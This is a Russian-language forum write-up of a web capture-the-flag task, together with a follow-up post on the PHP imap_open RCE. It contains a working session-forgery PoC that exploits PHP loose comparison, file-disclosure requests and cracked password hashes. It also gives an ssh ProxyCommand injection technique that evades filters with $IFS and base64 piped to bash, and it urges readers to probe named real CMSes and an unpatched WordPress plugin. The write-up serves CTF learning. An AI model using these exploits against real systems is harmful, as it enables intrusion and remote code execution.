Прошло 78 дней, которых вполне достаточно для решения тасков подобной сложности, поэтому, с вашего позволения (нет), буду подводить итог
Спасибо всем кто учавствовал! Отдельный респект затащившим: @Twoster (https://antichat.live/members/63847/), @rrock (https://antichat.live/members/287032/), @Felis-Sapiens (https://antichat.live/members/268504/) (да, не взял 5й флаг, но если бы получил киллер хинт, то затащил бы с лёгкостью, поэтому зачёт). Вы просто космос, уважуха гайзы, вы хенкеры и ниипёт!
Ниже представлен примерный ход прохождения, который описан по мере возможности, так как половину того, что хотелось бы написать уже стёрлось из памяти. Поэтому если не брезгуете читать обрывочные суждения и местами словесный понос, милости прошу
⚑ 1. {SKL_IT_WAS_EASY}
Часто при анализе чёрным ящиком используется фаззинг параметров. Передача различных комбинаций или изменение типа передаваемых параметров, может повлечь за собой нестандартное поведение исследуемого приложения. Помимо получения различных аномалий для дальнейшего изучения, порой можно получить много информации о системе, в случаях, когда разработчики забывают отключить инструменты для отладки или сообщения об ошибках.
Для завладевания первым флагом, достаточно изменить тип:
Code:
POST / HTTP/1.1
Host: 80.211.180.74
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:53.0) Gecko/20170101 Firefox/53.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
username[]=&password=&login=Login
Что в свою очередь повлечёт выдачу отладочного сообщения:
Code:
We've got 500, something went wrong... Array
(
[_GET] => Array
(
)
[_POST] => Array
(
[username] => Array
(
[0] =>
)
[password] => Array
(
[0] =>
)
[login] => Login
)
[_COOKIE] => Array
(
)
[_FILES] => Array
(
)
[users] => Array
(
[skillprogrammer] => Array
(
[userid] => 1000001
[password] => 805e33bbec4739bc0da4b6eeb3720c6fa9f0947921d4cf8996 c3929275c8f89353c925983ff7c4c78e998f3803d0ddcccc66 16d47e05af05caa4ebeaf848814f
)
[annie] => Array
(
[userid] => 1000002
[password] => 3a2a5e118c11478d971f896554ac4fc012c5bfbc3f17f8fd20 942f81a2dd064a992f6cd2f4856991bb77684c98f44edd291b a17d3cb2fa439588142e36874181
)
[joe] => Array
(
[userid] => 1000003
[password] => 7d014b30e1e9611c210298bddc6135d5530f4cfc7b94208f82 554c56bbe19c5a8a373ba3284b79c36ade8adc9c1a49449c13 60e210abf119ea237f102cfe815a
)
[donald] => Array
(
[userid] => 1000004
[password] => 8cb17d4622c3d9ddc925bc43942bd2be383b30aa2dc3c6a23e f84f0e6cd7c2365378f8e4d098e79675569670b5ab6e9ea3f8 af12ad559443ffb6dcd8ee5981b3
)
)
[check] =>
[login] => 1
[user] => 0
[_SERVER] => Array
(
[USER] => www-data
[HOME] => /var/www
[HTTP_CONTENT_TYPE] => application/x-www-form-urlencoded
[HTTP_CONTENT_LENGTH] => 35
[HTTP_ACCEPT] => */*
[HTTP_USER_AGENT] => Mozilla/5.0 (Windows NT 5.1; rv:53.0) Gecko/20170101 Firefox/53.0
[HTTP_HOST] => 80.211.180.74
[REDIRECT_STATUS] => 200
[SERVER_NAME] => _
[SERVER_PORT] => 80
[SERVER_ADDR] => 80.211.180.74
[REMOTE_PORT] => 17229
[REMOTE_ADDR] => 89.232.69.92
[SERVER_SOFTWARE] => nginx/1.10.3
[GATEWAY_INTERFACE] => CGI/1.1
[REQUEST_SCHEME] => http
[SERVER_PROTOCOL] => HTTP/1.1
[DOCUMENT_ROOT] => /var/www/html
[DOCUMENT_URI] => /index.php
[REQUEST_URI] => /
[SCRIPT_NAME] => /index.php
[CONTENT_LENGTH] => 35
[CONTENT_TYPE] => application/x-www-form-urlencoded
[REQUEST_METHOD] => POST
[QUERY_STRING] =>
[SCRIPT_FILENAME] => /var/www/html/index.php
[PATH_INFO] =>
[FCGI_ROLE] => RESPONDER
[PHP_SELF] => /index.php
[REQUEST_TIME_FLOAT] => 1535567054.7217
[REQUEST_TIME] => 1535567054
[0] => Array
*RECURSION*
)
[GLOBALS] => Array
*RECURSION*
)
{SKL_IT_WAS_EASY} -->
Забавный факт, мембер @vulnbe (https://antichat.live/members/321143/) прислал вариант, который небыл учтён, так как прохождение закладывалось линейным, учитывались многие факторы, но одни из них проскочил. Пусть это получилось не преднамеренно, но всё же, не менее показательно. Отсутствие параметра username, так же влечёт аналогичные последствия
.SpoilerTarget" type="button">Spoiler: Мысли в слух
Меня несколько раз упрекали в том, что данный таск надуманный. Если взглянуть на современные фреймворки и какую информацию они выдают в отладочном режиме:
https://i.imgur.com/wA9Ncip.png
Я, в свою очередь, могу с уверенностью поставить под сомнение адекватность этих упрёков. Чего только стоит раскрытие локальных путей на одном из сайтов конторы предлагающей пентесты. И являющейся лидером по оказанию подобных услуг в своём регионе. Казалось бы, безобидный пустой POST, что может пойти не так ?
⚑ 2. {SKL_FILE_DISCLOSURE_IS_AWESOME}
Изучив полученную отладочную информацию, можно заметить наличие логинов пользователей и хешированные пароли. Проведя нехитрый анализ алгоритма хеширования или просто загуглив, выяснится что это SHA512 и для нескольких из них можно легко получить значения, так как пароли являются слабыми.
annie:nobody
donald:trump
Попробовав любую пару, получаем в ответ You not authorized to access that tool, sorry :'(. По каким-то причинам доступа нет, возможно, у пользователя мало прав или он был ограничен в использовании. Но тут уже что-то новое и это хорошо. Заглядываем в HTML и внимательно изучим ответ:
HTML:
...
...
vs, без аутентификации:
HTML:
...
...
Для пользовательского интерфейса используется иная загрузка CSS стилей. Здесь в пору попробовать изучить эту подачу. Убеждаемся, что оба файла доступны в корневой директории хоста. Далее пытаемся отстраивать различные конструкции с использованием комбинаций для эксплуатации Directory Traversal, которые могли бы заставить читать файл стилей из текущей директории или выше (./, ../).
При этом, держа в голове или записывая все варианты поведения и сопоставляя их между собой. Долго ли, коротко ли, должны прийти к неким выводам, что файлы читаются только из текущей директории и только при наличии .css. Поэтому такая конструкция, вполне удовлетворяет:
Code:
http://80.211.180.74/?css=style.css,user.css/functions.php
Этот код:
PHP:
functionmaybeCSSRequest(){
if(!isset($_GET['css'])) return;
$css='';
$files=array_map('trim',explode(',',$_GET['css']));
foreach($filesas$file)
$css.= (strpos($file,'.css') !==false?file_get_c ontents(basename($file)) :'');
header('Content-type: text/css');
exit($css?$css:'Hacking attempt!');
}
Который по причине ошибки валидации, позволяет читать произвольные файлы из текущей директории. Будь там регулярка типа /css$/ или сравнение расширений по вайт листу, то подобный финт ушами не прокатит.
А вот и несколько уязвимостей подобного типа: 1 (https://blog.vaultpress.com/2011/08/02/vulnerability-found-in-timthumb/), 2 (http://portfob.ru/security-time/0day-exploit-for-wordpress-plugins-simple-ads-manager-sam-pro-lite-sam-pro-free-edition/) (не надуманно! )
⚑ 3. {SKL_AUTH_BYPASSED_LIKE_A_PRO}
Получение читалки на желаемой цели, наверное один из лучших вариантов развития собыйтий при продвижении вглубь.
Вычитываем все возможные файлы и приступаем к изучению. Если не заметили до этого, то по коду видим, что аутентифицированному пользователю присваивается кука rememberSession, которая впоследствии "запоминает" пользователя для приложения. Так как в наличии есть ещё пара юзеров с неизвестными паролями, которые, возможно, имеют более высокий уровень доступа, вполне уместно разобраться с механизмом сессий:
PHP:
functiongenerateSession($userid,$javaScript='N',$c ookieEnabled='N'){
$javaScript=strtoupper($javaScript);
$cookieEnabled=strtoupper($cookieEnabled);
if($javaScript!='N'&&$javaScript!='J')$javaScript='N';
if($cookieEnabled!='N'&&$cookieEnabled!='C')$cookieEnabled='N';
$iSession=
$protectionBlock=
$sessionBlock=
$userBlock=
$timeBlock='';
$sessionBlock=strtoupper(uniqid('p',true));
$sessionBlock=str_replace(array('-','@'),rand(0,9),$sessionBlock);
$userBlock=str_pad($userid,8,'0',STR_PAD_LEFT);
$protectionBlock=getHash($userBlock.$sessionBlock. getSalt());
$timeBlock=getTimeOffset();
$iSession=$javaScript.$cookieEnabled.$sessionBlock .$userBlock.$timeBlock;
$cut1=substr($iSession,0,4);
$cut2=substr($iSession,4,8);
$cut3=substr($iSession,12,2);
$cut4=substr($iSession,14,6);
$cut5=substr($iSession,20,5);
$cut6=substr($iSession,25,5);
$cut7=substr($iSession,30,5);
$cut8=substr($iSession,35,3);
$iSession=$cut2.$protectionBlock{12}.$cut4.$protec tionBlock{2}.$cut3.$protectionBlock{30}.$cut8.$pro tectionBlock{25}.
$cut7.$protectionBlock{20}.$cut6.$protectionBlock{ 17}.$cut5.$protectionBlock{8}.$cut1;
returnstrtoupper($iSession);
}
functiongetSessionArray($iSession){
$expire_time=5;
$session_array= array();
$timeCheck=getTimeOffset();
$cut2=substr($iSession,0,8);
$cut4=substr($iSession,9,6);
$cut3=substr($iSession,16,2);
$cut8=substr($iSession,19,3);
$cut7=substr($iSession,23,5);
$cut6=substr($iSession,29,5);
$cut5=substr($iSession,35,5);
$cut1=substr($iSession,41,4);
$pcut1=$iSession{8};
$pcut2=$iSession{15};
$pcut3=$iSession{18};
$pcut4=$iSession{22};
$pcut5=$iSession{28};
$pcut6=$iSession{34};
$pcut7=$iSession{40};
$protectionBlock=$pcut1.$pcut2.$pcut3.$pcut4.$pcut 5.$pcut6.$pcut7;
$iSession=$cut1.$cut2.$cut3.$cut4.$cut5.$cut6.$cut 7.$cut8;
$iSession=strtoupper($iSession);
$sessionBlock=substr($iSession,2,24);
$userid=substr($iSession,26,8);
$timeBlock=substr($iSession,34,4);
$javaScript=$iSession{0};
$cookie_enabled=$iSession{1};
$test_protection_hash=strtoupper(getHash($userid.$ sessionBlock.getSalt()));
$test_protection=$test_protection_hash{12}.$test_p rotection_hash{2}.$test_protection_hash{30}.$test_ protection_hash{25}.$test_protection_hash{20}.$tes t_protection_hash{17}.$test_protection_hash{8};
if ($test_protection!=$protectionBlock|| !is_numeric($timeBlock)) returnfalse;
$time_dif=$timeCheck-$timeBlock;
$session_expired=false;
if ($time_dif>=$expire_time||$time_dif$expire_time) ?0:$expire_ time-$time_dif;
$session_array['base_minutes'] =$timeBlock;
$session_array['cookie'] =$cookie_enabled;
return$session_array;
}
Для генерации нужен всего лишь userid пользователя и он у нас есть. Но попробовав сгенерировать, сталкиваемся с проблемой. Для создания сессионной строки используется соль, лежащая в файле /var/opt/inc/salt, который недоступен, по причине ограниченности читалки.
На этом моменте вполне можно сдаться, аргумент весомый - отсутствие главного поваренного ингредиента. Но ведь нельзя просто так взять и забить когда есть исходники?!
Учитываем одно неизвестное и продолжаем, смотрим проверку или извлечение данных из сессионной строки. Выкинув всё лишние, находим главный участок валидации который нас отбраковывает:
PHP:
functiongetSessionArray($iSession){
...
if ($test_protection!=$protectionBlock|| !is_numeric($timeBlock)) returnfalse;
...
}
или, к примеру:
PHP:
functiongetSessionArray($iSession){
...
if ('1F13EF8'!='B998342'|| !is_numeric(' 1384')) returnfalse;
...
}
Сравнивается два блока, переданный нами и блок сгенерированный на сервере. Первым делом, на ум приходит брутфорс неизвестного нам значения. Семь символов в диапазоне A-Z0-9 дают 268 000 000 вариантов, один из них позволит обойти механизм проверки без знания соли. Но, во первых, это долго, во вторых трудно эксплуатируемо через интернет, так как один неудачный коннект или не предполагаемый респонс сервера, будут ломать всю картину.
Можно набросать качественный код с реализацией всевозможных исключений, ошибок коннекта и прочих неприятностей, но это никак не отменяет первой причины. Нам не годится, но имеет право на жизнь.
Поэтому погуглив на тему "PHP уязвимости сравнения", "ошибка сравнения PHP" или что-то в этом духе, находим множество материалов посвящённых данной теме. Суть которых заключается в том, что при сравнении != или ==, происходит преобразование типов, такое сравнение ещё называют "нестрогим", и если строка начинается с "0e", а после нее следуют только цифры, для PHP это будет float значение. Поэтому:
PHP:
var_dump('0e462097431906509019562988736854'=='0');
var_dump('0e462097431906509019562988736854'=='0e68 9757431906419875624564334234');
bool(true)
bool(true)
В своё время это была довольно крутая находка, но всё же не совсем лёгкая в эксплуатации, так как всё-равно приходится перебирать кучу вариантов. Но что касается нашего кейса, где всего 7 символов, этот вариант как нельзя кстати. Гененрируя различные сессии, со статичными значениями $protectionBlock и $userid, мы точно попадём в подобное сравнение или как написал @Felis-Sapiens (https://antichat.live/members/268504/) - "В среднем будет успешна каждая (16^7 / 10^5) ~ 2684 попытка. Мне потребовалось 3709".
PoC:
PHP:
array(
'method'=>'GET',
'header'=>'Cookie: rememberSession='.$iSession.';',
'user_agent'=>'Mozilla/5.0 (Windows NT 5.1; rv:53.0) Gecko/20170101 Firefox/53.0',
'timeout'=>60,
'ignore_errors'=>true
)
);
#return @file_get_contents('http://tmp/task/', false, stream_context_create($opts));
return @file_get_contents('http://80.211.180.74/',false,stream_context_create($opts));
}
functiongenerateSession($userid){
$timeBlock=rand(1111,9999);
$protectionBlock='0E12345';
$sessionBlock=strtoupper(uniqid('p',true));
$userBlock=str_pad($userid,8,0,STR_PAD_LEFT);
$iSession='N'.'N'.str_replace(array('-','@'),rand(0,9),$sessionBlock).$userBlock.$timeBl ock;
list($cut1,$cut2,$cut3,$cut4,$cut5,$cut6,$ cut7,$cut8) = array(substr($iSession,0,4),substr ($iSession,4,8),substr($iSession,12,2),substr($iSe ssion,14,6),substr($iSession,20,5),substr($iSessio n,25,5),substr($iSession,30,5),substr($iSession,35 ,3));
returnstrtoupper($cut2.$protectionBlock{0} .$cut4.$protectionBlock{1}.$cut3.$protectionBlock{ 2}.$cut8.$protectionBlock{3}.$cut7.$protectionBloc k{4}.$cut6.$protectionBlock{5}.$cut5.$protectionBl ock{6}.$cut1);
}
?>
Результат выполнения:
Valid rememberSession for 1000001 is: B870EA820820.84E4F10772000183901004629005NNP5
Guessed for 48 attempts
Bonus! Для тех кто дочитал Если понравился этот баг, предлагаю самостоятельно расковырять 0day в плагине BlogVault (https://wordpress.org/plugins/blogvault-real-time-backup/). После байпаса, станет доступен RCE без авторизации.
⚑ 4. {SKL_OH_NO_FPD_HAPPENED_RCE_IS_COMING}
Сплоит написали, теперь есть возможность стать любым пользователем в системе. После успешного применения, видим перед собой некое альфа приложение, которое позволяет подключаться к произвольному почтовому сервису средствами IMAP и читать новые письма.
Исходников этого функционала у нас пока нет, по причине отсутствия нужного префикса, который как и соль лежит там где взять не получается. Во время извлечения предыдущего флага, вполне можно заметить рядом закомментированный инпут:
HTML:
...
Пробуем добавить параметр в запрос, учитывая что чекнутый input является значением on, и отправляем невалидные данные:
Code:
POST / HTTP/1.1
Host: 80.211.180.74
Cookie: rememberSession=B870EA820820.84E4F1077200018390100 4629005NNP5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Referer: http://80.211.180.74/
Content-Type: application/x-www-form-urlencoded
iserver=sdasd&ilogin=asdasd&ipassword=asdasd&idebug=on&check=Get
Если всё получилось, то увидим сообщения вида:
Warning: imap_open(): Couldn't open stream {sdasd:993/imap/ssl}INBOX in /var/www/html/int3rnal_us3_0nly_project.php on line 27
Error: No such host as sdasd
Пых выдал ворнинг, а мы получили наш префикс "int3rnal_us3_0nly". Читаем файл и флаг наш!
⚑ 5. {SKL_I_LUV_PHP_IMAP_AND_RCE}
Изюминка квеста, король вечера, Remote Command Execution, 0day, разрыв пуканов и всё-всё-всё, но не сегодня
В связи со сложившимися обстоятельствами, баг, послуживший материалом для создания этого задания, будет освящён на ежегодной конференции по ИБ - Kaz'Hack'Stan (https://kazhackstan.kz/), которая состоится 5 октября 2018.
Докладывать будет @Twoster (https://antichat.live/members/63847/). Он же готовит подробную презу с нюансами, покрытием, причинами и следствием этой уязвимости, которых здесь, скорее всего, небыло бы.
Поэтому ждём, пинаем Твоста в ТГ, чтоб не бакланил и как следует пропиарил Античат на профильном мероприятии!
P.S. Не стесняйтесь, дополняйте, критикуйте и обсуждайте. Всем бобра
Друзья, всем привет!
Каретка меня уже скоро убьет, поэтому пишу разбор пятого таска)
1)Все мы знаем как выглядит стандартный вызов imap_open в php. Примерно так:
PHP:
$imap=imap_open('{'.$_POST['server'].':993/imap/ssl}INBOX',$_POST['login'],$_POST['password']);
Как мы видим, в функцию мы передаём имя хоста, порт, флаги и пару логин:пароль.
Полный список флагов можно найти наофициальной странице (http://php.net/manual/ru/function.imap-open.php) этой функции http://php.net/manual/ru/function.imap-open.php
https://lh6.googleusercontent.com/mq_YMpehNt_v1u2YRj0Ki68rshoNIeCiSUeMeLk0oEkRz1TRPm 26nUF4bxM1-5EHwg7ckJEwx14RN8agafA2M6PQRhFFs7F5s0sfSTpH6nk0FN8 BmRkpxcNC7bUqd1Er0l_GuLa4wew2)Нас интересует один флаг:
/norsh
не использовать rsh или ssh для установки преавторизованной сессии IMAP
Начнем с того, что сама функция imap_open не является функцией самого ядра php. Функция является обёрткой для функции из библиотеки imap-2007f (https://www.mirrorservice.org/sites/ftp.cac.washington.edu/imap/imap-2007f.tar.gz). Эта библиотека разработана в Вашингтонском Университете. Как видно из названия, библиотека была разработана еще в 2007 году, и последняя актуальная версия была изменена в 2011 году, и носит версию f.
Короч, мы уже осознаём, что баге больше 10 лет.
Возвращаемся к флагу /norsh.
Библиотека imap содержит в себе функционал для установки преавторизованной сессии.
Что это значит?
Библиотека перед коннектом к указаному серверу и порту решает проверить, а вдруг мы там привилегированный пользователь. И пытается приконнектится с указаным логином и паролем по rsh или ssh к хосту, и запустить там rimapd.
В исходниках библиотеки это выглядит так:
PHP:
#ifdef SSHPATH /* ssh path defined yet? */
if (!sshpath)sshpath=cpystr(SSHPATH);
#endif
#ifdef RSHPATH /* rsh path defined yet? */
if (!rshpath)rshpath=cpystr(RSHPATH);
#endif
if (*service=='*') {/* want ssh? */
/* return immediately if ssh disabled */
if (!(sshpath&& (ti=sshtimeout))) returnNIL;
/* ssh command prototype defined yet? */
if (!sshcommand)sshcommand=cpystr("%s %s -l %s exec /etc/r%sd");
}
/* want rsh? */
else if (rshpath&& (ti=rshtimeout)) {
/* rsh command prototype defined yet? */
if (!rshcommand)rshcommand=cpystr("%s %s -l %s exec /etc/r%sd");
}
else returnNIL;/* rsh disabled */
Как мы видим из сорцов, сначала мы проверяем указан ли SSHPATH, если не указан, то проверяет RSHPATH и пытается подключиться к нему.
Ищем в сорцах что это за RSHPATH и SSHPATH.
a) SSHPATH судя по сорцам формируется из файла /etc/c-client.cf
PHP:
/* dorc() options */
#define SYSCONFIG "/etc/c-client.cf"
Ищет в этом файле строку set ssh-path
PHP:
/* Process rc file
* Accepts: file name
* .mminit flag
* Don't use this feature.
*/
void dorc(char*file,long flag)
...
mail_parameters(NIL,SET_SSHCOMMAND,(void*)k);
else if (!compare_cstring(s,"set ssh-path"))
Но или лыжи не едут, или я в плюсах тугой (а так и есть). Но у меня не удалось воспроизвести ситуацию, чтобы был коннект по ssh. Хотя файл он читает, я проверил)
Короч, это задел на будущее всем желающим, еще есть куда ресёчить. Идём дальше.
b) RSHPATH
Если посмотреть в makefile, который расположен в src/osdep/unix, то мы для каждой системы семейства unix видим что-то вроде
RSHPATH=/usr/bin/rsh
3) Преавторизованная сессия
как мы помним из кода выше, вся жара происходит в функции
tcp_aopen. Забавно, что это будет работать только в линупсах.
А вот почему:
PHP:
TCPSTREAM*tcp_aopen(NETMBX*mb,char*service,char*us rbuf)
{
returnNIL;/* always NIL on Windows */
}
PHP:
TCPSTREAM*tcp_aopen(NETMBX*mb,char*service,char*us rbuf)
{
returnNIL;/* always NIL on DOS */
}
PHP:
TCPSTREAM*tcp_aopen(NETMBX*mb,char*service,char*us rbuf)
{
returnNIL;/* no authenticated opens on Mac */
}
Итак, что мы имеем по итогам?
- Вызывается преавторизованная сессия только в линуксе
- Путь к RSH указан хардкорно в makefile, а к ssh не указан и вернее всего не укажется. Как минимум потому что права на запись в /etc/ только у root. Да и не сработало чёт.
Идём дальше. Посмотрим что вообще происходит с RSH в 2к18:
RSH в BSD Unix появился как часть пакета rlogin в 1983 году. 35 лет назад
На сегодняшний день:
RHEL-like: rsh= not found
Debian-like: rsh-> ssh
Arch Linux: rsh= rsh
FreeBSD: rsh = rsh (deprecated)
4) Подготовка мозгов к эксплуатации уязвимости.
Мы уже можем предположить, что мы можем влиять на системный вызов, который запускает rimapd. Как минимум мы передаём туда хостнейм.
Кстати, вызов выглядит так:
[pid 4350] execve("/usr/bin/rsh", ["/usr/bin/rsh", "localhost", "-l", "twost", "exec", "/usr/sbin/rimapd"], [/* 54 vars */]
Не буду даже вдаваться в подробности вызова rsh, потому что он обрезан больше чем мусульманский еврей.
Сразу обратим внимание на системы семейства Debian. В них отсутствует rsh, он просто линкуется в ssh. Он то нам и нужен.
https://lh3.googleusercontent.com/PoLnstdoIKl3k8dBMuk59YSBEUPrmXTrC7y7-xxl_Vkksy5-Xwu0c6Z5OFgCVs3s8A75EWmaXDwIgvHwYqbHK4UJk4OvNzbv4w D_GZD66qxXvu4nqiqo_ch58SCODbgUG84DK2ntw6Q
Я собрал небольшую статистику по серверам, и вот что вышло (по баннерам web-сервера):
Ubuntu - 2743
Windows Server - 1254
Debian - 909
CentOS - 821
UNIX - 306
Gentoo - 150
FreeBSD - 103
5) Изучаем маны ssh
Если почитать маны ssh, то можно увидеть такой интересный момент
$ man ssh
-o option
Can be used to give options in the format used in the configuration file. This is useful for specifying options for which there is no separate command-line flag. For full details of the options listed below, and their possible values, see ssh_config(5).
Мы можем передавать опции при вызове ssh, а среди этих опций есть очень забавная ProxyCommand.Что она делает? Выполняет команду на текущем хосте, перед подключением к серверу.
Ты ведь уже понял, да? Ну скажи что понял?
$ ssh -oProxyCommand="touch /tmp/test/123" localhost
ssh_exchange_identification: Connection closed by remote host
$ ls -la /tmp/test/
drwxr-xr-x 2 twost twost 4096 окт 4 17:42 .
drwxrwxrwt 25 root root 3674112 окт 4 17:39 ..
-rw-r--r-- 1 twost twost 0 окт 4 17:42 123
Теперь то точно понял?
6) А мы не только RCE-шим, но еще и bypass-им
https://lh6.googleusercontent.com/jrXrVD9DUVUTY31kcaoQ2VyCZT31BPJCZ010pfGspXzzgF6jDU d6ZmKgUFfFdp7dTQrR4pzfv-nPus1-ST4ZtKhR5IptzPVMX8Xf9tgZ_kADwMiRPxsbX1fHv8ArLnAJ25 3U8tTjBK8
Нам никак не мешают отключенные системные функции в php, потому что наше rce с помощью ProxyCommand проходит вообще вне php, отдельным процессом, который вызывает библиотека, а не интерпретатор. Такие дела.
7) Вызов RSH -> SSH. Парсинг аргументов.
На этом моменте я уже устал печатать и напишу кратко.
Аргументы парсятся по пробелам, а флаги по слешам. Нам нужно обойти оба.
Пробелы обходим с помощью $IFS$(), а слеши с помощью echo base64decodedstring==|base64 -d| bash
8) PWN3D!
Сломаем-ка PrestaShop для примера:
https://lh6.googleusercontent.com/6Ju9aeYnXLQ6L2kuVzMVidECxqqhbY5Rb_M_fI_P27fslskpTF 7ti1b_3gxuE98JZ6WxiUtUWFF1_35yiNQq_26gAqHUM66popmq o6MpZZFM3IKxHGvaDDZHq7titRpBWGqrAxLYYUo
Ловим бекконект:
https://lh4.googleusercontent.com/J3sbPaXfaKhjj9zvKpJ-6Upzvuh9XFon9c3S8sCZrbSPkm6jSYnOO4AO1yPV4MyC8bdPtj hSBMD7YAEW4xdXaBJNvkG3NvcwpypXrdiuX8orgUN29VFkF6Ot Wnw1rXJHQkDYfmW-6Eo
9) Что рекомендую посмотреть?
Я конечно ни на что не намекаю, но я бы на твоем месте, %username%, уже побежал ковырять например:
instantcms
HostCMS
e107_2
prestashop
SuiteCRM
SugarCRM
И возможно что-то еще)
Я кончил.
Спасибо crlfза охуенный таск
Видео доклада с конференции Kaz'Hack'Stan (клик на начало доклада или перемотайте на 6:15) (https://youtu.be/M2hzLzfqZj8?t=22505):
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot